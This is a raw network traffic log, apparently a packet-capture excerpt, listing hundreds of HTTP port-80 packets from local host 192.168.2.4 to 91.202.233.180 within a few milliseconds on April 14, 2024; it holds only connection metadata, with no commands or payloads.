Apr 14, 2024 08:45:42.067166090 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067193985 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067213058 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067236900 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067259073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067280054 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067301035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067323923 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067354918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067379951 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067399025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067425966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067447901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067468882 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067492962 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067517996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067538977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067560911 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067581892 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067604065 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067625046 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067646980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067670107 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067697048 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067723036 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067751884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067775965 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067797899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067821980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067842960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067862988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067886114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067909956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067933083 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067954063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067975044 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067997932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068020105 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068051100 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068073988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068095922 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068116903 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068139076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068162918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068185091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068207026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068228960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068250895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068275928 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068294048 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068316936 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068341017 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068366051 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068382978 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068412066 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068438053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068458080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068479061 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068500042 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068517923 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068540096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068563938 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068583965 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068605900 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068629980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068651915 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068676949 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068695068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068722963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068744898 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068766117 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068787098 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068809032 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068829060 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068851948 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068873882 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068896055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068914890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068938971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068963051 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.068986893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069004059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069031954 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069056988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069077969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069103956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069123030 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069145918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069166899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069188118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069211960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069231987 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069253922 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069276094 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069300890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069318056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069343090 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069365025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069387913 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069406986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069431067 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069454908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069475889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069494009 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069518089 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069545031 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069555998 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069583893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069605112 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069628000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069653034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069664955 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069694042 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069715977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069735050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069760084 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069777012 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069801092 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069820881 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069845915 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069864988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069888115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069911957 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069933891 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069953918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069969893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.069998980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070019960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070043087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070063114 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070086002 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070106983 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070127010 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070151091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070172071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070194960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070218086 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070240974 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070264101 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070282936 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070307016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070331097 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070350885 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070374012 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070419073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070419073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070440054 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070461988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070485115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070501089 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070529938 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070544958 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070570946 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070593119 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070612907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070631027 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070652008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070677996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070702076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070722103 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070744991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070766926 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070786953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070810080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070832014 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070854902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070874929 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070898056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070920944 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070944071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070964098 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.070985079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071011066 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071026087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071052074 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071074963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071090937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071118116 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071139097 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071162939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071186066 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071206093 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071229935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071245909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071270943 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071288109 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071315050 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071337938 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071361065 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071386099 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071398973 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071424007 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071446896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071464062 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071490049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071511984 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071533918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071554899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071578026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071600914 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071618080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071641922 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071662903 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071686029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071706057 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071724892 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071749926 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071774006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071798086 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071811914 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071836948 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071856022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071882963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071894884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071923018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071942091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071968079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.071989059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072011948 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072035074 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072055101 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072074890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072099924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072122097 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072143078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072163105 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072184086 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072207928 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072227001 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072252035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072289944 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072309971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072334051 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072355986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072380066 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072403908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072423935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072444916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072465897 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072484970 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072508097 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072531939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072554111 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072577000 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072598934 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072621107 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072642088 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072664976 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072688103 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072706938 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072729111 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072751045 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072772980 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072787046 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072813034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072835922 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072858095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072874069 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072901011 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072921991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072943926 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072963953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.072988033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073009014 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073031902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073050976 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073074102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073096037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073122025 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073141098 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073163033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073184967 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073210001 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073230982 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073252916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073275089 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073297977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073318005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073339939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073359966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073383093 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073401928 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073424101 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073446035 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073466063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073487997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073508024 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073529959 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073553085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073571920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073596001 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073617935 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073646069 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073654890 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073682070 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073703051 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073723078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073746920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073772907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073796034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073817015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073831081 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073863029 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073877096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073899031 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073924065 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073951006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073971987 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.073990107 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074012995 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074033022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074054956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074079037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074100971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074121952 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074161053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074181080 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074203968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074225903 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074246883 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074268103 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074290037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074314117 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074336052 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074357033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074372053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074398994 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074421883 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074445009 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074466944 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074487925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074508905 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.074531078 CEST	49741	80	192.168.2.4	91.202.233.180
